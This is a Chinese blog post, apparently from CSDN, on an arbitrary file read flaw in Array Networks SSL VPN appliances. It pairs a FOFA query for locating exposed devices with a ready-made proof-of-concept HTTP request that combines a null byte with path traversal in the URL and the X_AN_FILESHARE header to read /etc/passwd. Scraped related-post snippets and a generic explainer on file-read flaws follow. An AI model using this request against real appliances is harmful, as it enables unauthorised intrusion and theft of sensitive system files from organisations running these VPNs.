Array VPN任意文件读取

原创 已于 2025-05-15 13:16:45 修改 · 370 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全威胁分析 #漏洞复现 #漏洞库 #漏洞利用 #渗透测试

于 2025-05-15 11:30:29 首次发布

公司描述

华耀(中国)科技有限公司(简称:阵列)于2003年创建于北京,是优秀的网络功能平台解决方案提供商,也是应用交付解决方案、移动应用接入(SSLVPN)解决方案的全球领导者。华耀现有员工200余其中研发团队占到100余人,总部位于北京。并在北京、上海、广州、杭州、深圳设有销售及技术支持部门,负责全国的销售及客户支持工作。Array一贯秉持为用户打造敏捷灵活与安全性能兼顾的网络环境的理念。作为多年的应用交付解决方案全球领导者,阵列确保应用性能、高可靠性和安全性的同时将应用推送到终端用户。通过阵列产品,用户可以使用任何设备、从任何地点访问云环境或企业数据再到云服务日,阵列解决方案提供中心的应用、桌面或服务。从网络站点、到电子商务、到企业应用、了卓越的终端用户体验和可靠的安全性,全力保障企业的运营效率。

fofa

product="Array-VPN"

poc

GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
Dnt: 1
Upgrade-Insecure-Requests: 1
Connection: close
漏洞复现Array VPN任意文件读取漏洞
失心少年
11-26 2576
耀(中国)科技有限公司(简称:Array)于2003年创建于北京,是优秀的网络功能平台解决方案提供商,也是应用交付解决方案、移动应用接入(SSL VPN)解决方案的全球领导者。从Web站点、到电子商务、到企业应用、再到云服务,Array解决方案提供了卓越的终端用户体验和可靠的安全性,全力保障企业的运营效率。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
7.1 XML处理
Kaitiren的专栏
02-06 214
XML作为一种数据交换和信息传递的格式已经十分普及。而随着Web服务日益广泛的应用,现在XML在日常的开发工作中也扮演了愈发重要的角色。这一小节, 我们将就Go语言标准包中的XML相关处理的包进行介绍。 这个小节不会涉及XML规范相关的内容(如需了解相关知识请参考其他文献),而是介绍如何用Go语言来编解码XML文件相关的知识。 假如你是一名运维人员,你为你所管理的所有服务器生成了如下内容的xml的配置文件: <?xml version="1.0" encoding="utf-8"?> &
Array-VPN任意文件读取
hobbo__的博客
08-15 1484
【代码】Array-VPN任意文件读取
Array VPN 设备常用配置维护
weixin_66969509的博客
06-28 2788
使用浏览器登录 https:// array 设备 VPN 外网 IP:8888 例:https:// 120.26.116.10:8888 需要说明: 如果客户使用的是 SLB,则需要在 SLB 开通 443(登录 VPN)端口 和 8888 (管理 VPNWeb 控制台)端口。Enable 密码:默认未设置,直接点击 login 即进入 web 控制台。全局模式下 config 模式下-全局管理-双击管理员账户。修改完密码后点击保存,最后点击保存配置,将当前配置存盘。
VPN】浅谈VPN 简单了解
Best_lgx的博客
04-18 4929
在企业的信息化建设中,往往需要对内部系统进行外网访问。例如,公司在海外设有办事处,员工需要通过互联网访问公司内部资源;或者应用程序需要与外部系统进行交互等。这时候就需要实现。在没有VPN之前,企业的总部和分部之间的互通都是采用运营商的internet进行通信,那么Internet中往往是不安全的,通信的内容可能被窃取、修改等,从而造成安全事件。1、端口映射:将公网IP和端口与内网IP和端口绑定,可实现外部用户访问内网服务器。这种方式简单易懂,但安全性较低,容易受到网络攻击。
array networks
11-01
Array Networks
Array SSL客户端下载安装——您的浏览器没有获得Java Virtual Machine(JVM)支持。可能由于没有安装JVM或者已安装但是没有启用。请安装JVM1.5或者以上版本
qwe122343的博客
02-17 1万+
之前写了一篇如何校外登校园网登不上的博客,点此跳转,但不保证重置IE、重启电脑后一定能生效 今天介绍另外一种可靠的方案,前提:具有校园网上网账号和密码 安装Array SSL VPN 下载界面 以Windows 64位为例 下载解压后 / 或者直接压缩包在压缩软件中打开,运行SSLVPNSetup_x64.exe 安装后打开软件,空白处点击鼠标右键,选择“增加站点” 配置信息填写 点击连...
6、网络安全挑战中的文件读取漏洞实战解析
nept的博客
07-26 102
本文详细解析了多个网络安全CTF挑战中的文件读取漏洞实战案例,涵盖Nginx配置错误、Aria2任意文件写入、SQL二次注入、Discuz!X任意文件删除、Git源码泄露、FFMPEG任意文件读取、Docker SSRF攻击、Drupal反序列化漏洞等常见攻击手法。通过信息收集、漏洞利用、权限提升等步骤,展示了如何一步步获取flag。适用于网络安全爱好者、CTF参赛者及安全研究人员学习参考。
天翼云从业认证(1.2)存储的概念、体系结构、块存储、对象存储、文件存储以及 RAID 磁盘管理技术
康雨城
09-01 1816
(1)块存储、对象存储、文件存储 存储方式 技术实现 优势 劣势 代表作 块存储 裸盘上划分逻辑卷,逻辑卷格式化成任意文件系统 支持多种文件系统,传输速度快,提供硬件容错机制 无法实现网络共享 FC-SAN,iSCSI 文件存储 在格式化的磁盘上存储文件
系统架构设计师【第2章】: 计算机系统基础知识 (核心总结)
数据知道的博客
05-29 1万+
计算机系统 (Computer System)是指用于数据管理的计算机硬件、软件及网络组成的系统。它是按人的要求接收和存储信息,自动进行数据处理和计算, 并输出结果信息的机器系统。计算机系统可划分为硬件(子系统)和软件(子 系统)两部分。硬件由机械、电子元器件、磁介质和系统光介质等物理实体构成,例如处理器(含运算单元和 控制单元)、存储器、输入设备和输出设备等。软件是一系列按照特定顺序组织的数据和指令,并控制硬件完成指定的功能。可将计算机软件进一步分为系统软件和应用软件:系统软件。
【SOME/IP 】深入浅出vsomeip:打造高效车载通信系统指南
探索C++编程的奥秘,分享深入的技术见解和实践,旨在激发读者创造力与解决问题的思维。
11-16 1937
SOME/IP(Scalable service-Oriented MiddlewarE over IP)协议,作为一个现代车载网络通信的标准,正是这种力量的体现。它不仅仅是一套协议标准,更是一个连接人、车和环境的桥梁。而vsomeip库(Scalable service-Oriented MiddlewarE over IP Implementation),则是这座桥梁的关键支撑,它为车辆内部的服务发现、通信和管理提供了有效的工具。
【传送点】上千漏洞复现复现集合 exp poc 持续更新
失心少年
11-28 4717
漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现Array VPN任意文件读取漏洞漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞
Array-Networks-APV应用交付系统 ping_hosts 命令执行漏洞复现
iSee857的博客
09-16 912
Array Networks APV应用交付系统 /rest/ping_hosts 接口存在远程命令执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。参数输入时校验参数输入合法性。
Array Networks ***官网 客户端下载地址
weixin_34319640的博客
04-04 1万+
Array Networks ×××官网 客户端下载地址 http://client.arraynetworks.com.cn:8080/zh/troubleshooting 在网上搜索的h Array Networks ××× 客户端下载地址1.http://support.arraynetworks.com.cn/troubleshooting/IP下载地址为http://106.15.64....
windows7 -64 环境安装 Openssl
热门推荐
pengyun325的专栏
03-16 2万+
背景:由于使用gsoap时需要下载,必须安装OpenSSL,通过网上各种资料,其中遇到很多问题,反思记录下来。一、安装perl我使用的最新版本5.24.3.2404 ,下载地址https://www.activestate.com/activeperl/downloads,选择64位程序,直接安装,安装时可选择写入环境变量,不用手动写入。安装成功后,打开环境变量,path 已经写入,但是需...
Windows安装使用Openssl
weixin_30889885的博客
07-03 3679
1、什么是openssl? 2、下载安装 三方下载地址 备用64位和32位下载地址 选择32位或者64位合适的版本下载,例如Win64OpenSSL_Light-1_0_2h.exe: 设置环境变量,例如工具安装在C:\OpenSSL-Win64,则将C:\OpenSSL-Win64\bin;复制到Path中 打开命令行程序cmd(以管理员身份运...
企业多类型项目验收:渗透测试核心指南
最新发布
HNhlsa的博客
12-05 914
APP刚上线就因订单篡改漏洞造成经济损失;医院病历系统因安全漏洞导致数据泄露;电商平台促销前没做安全测试,被黑客利用漏洞通过优惠券套利近百万......这些教训的背后都指向同一个问题:企业在项目验收时了“安全测试”这一关键环节。2026年1月1日,新修订的《中人民共和国网络安全法》即将正式施行,罚款上限提到1000万!不管是用户用的网站、APP,还是公司内部的办公系统,渗透测试都从“可做可不做”升级为“强制要求”。本文将直击要害:企业为何必须开展渗透测试?又该在何时启动?
任意文件读取漏洞-高危
06-26
### 任意文件读取漏洞概述 任意文件读取漏洞(Arbitrary File Read Vulnerability)是一种常见的Web应用程序安全漏洞,攻击者可以利用漏洞访问服务器上的任意文件,包括系统文件、配置文件、数据库凭证等敏感信息。这类漏洞通常由于应用程序在处理用户输入时未进行充分的验证和过滤,导致攻击者可以通过构造特殊请求来绕过安全机制。 ### 漏洞原理 任意文件读取漏洞的核心原理在于应用程序对用户输入的路径参数缺乏严格的校验。例如,在URL中传递文件路径作为参数时,如果未对路径进行规范化处理或限制访问范围,攻击者可能通过构造类似`../`的路径遍历符号来访问上级目录中的文件。此外,某些应用可能会直接将用户输入拼接到文件路径中,而没有进行任何检查,这也为攻击者提供了可乘之机。 ### 利用方式 攻击者通常会通过以下几种方式来利用任意文件读取漏洞: 1. **路径遍历**:通过构造包含`../`的路径,尝试访问受限目录下的文件。例如,`/arcgis/manager/3370/js/../WEB-INF/web.xml`[^1]。 2. **本地文件包含(LFI)**:某些情况下,应用程序可能会动态包含本地文件,攻击者可以通过修改参数来包含并读取任意文件。 3. **远程文件包含(RFI)**:虽然不如LFI常见,但在某些配置不当的情况下,攻击者可能通过指定外部URL来引入恶意文件。 ### 危害与影响 任意文件读取漏洞的危害非常严重,主要包括以下几个方面: - **泄露敏感信息**:攻击者可以读取服务器上的配置文件、数据库连接字符串、密码文件等敏感数据,进而获取系统的控制权。 - **进一步渗透**:一旦获得系统内部的信息,攻击者可以利用这些信息发起更深层次的攻击,如SQL注入、命令执行等。 - **服务中断**:攻击者还可能通过读取关键系统文件而导致服务异常或崩溃,造成拒绝服务(DoS)攻击。 ### 修复方案 为了有效防范任意文件读取漏洞,建议采取以下措施: 1. **输入验证**:对所有来自用户的输入进行严格的验证,确保其符合预期格式。特别是对于文件路径相关的参数,应禁止使用特殊字符如`../`等。 2. **最小权限原则**:确保Web服务器和应用程序以最低必要权限运行,减少潜在风险。 3. **白名单机制**:对于需要访问特定文件的应用逻辑,采用白名单机制,仅允许访问预定义的安全路径。 4. **日志监控与告警**:定期审查服务器日志,发现异常访问行为及时响应,并设置相应的告警机制。 5. **更新与补丁管理**:保持软件版本的最新状态,及时安装官方发布的安全补丁。 ### 示例代码:防止任意文件读取 下面是一个简单的PHP示例,展示如何防止任意文件读取漏洞: ```php <?php // 定义允许访问的文件列表 $allowed_files = ['index.html', 'about.html', 'contact.html']; // 获取用户请求的文件名 $file = isset($_GET['file']) ? $_GET['file'] : ''; // 检查文件是否存在于白名单中 if (in_array($file, $allowed_files)) { // 文件存在白名单中,允许读取 readfile("files/" . $file); } else { // 文件不在白名单中,返回错误信息 http_response_code(403); echo "Forbidden"; } ?> ``` 上述代码通过定义一个白名单数组`$allowed_files`,并在处理用户请求之前对其进行检查,从而有效地阻止了非法文件访问。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值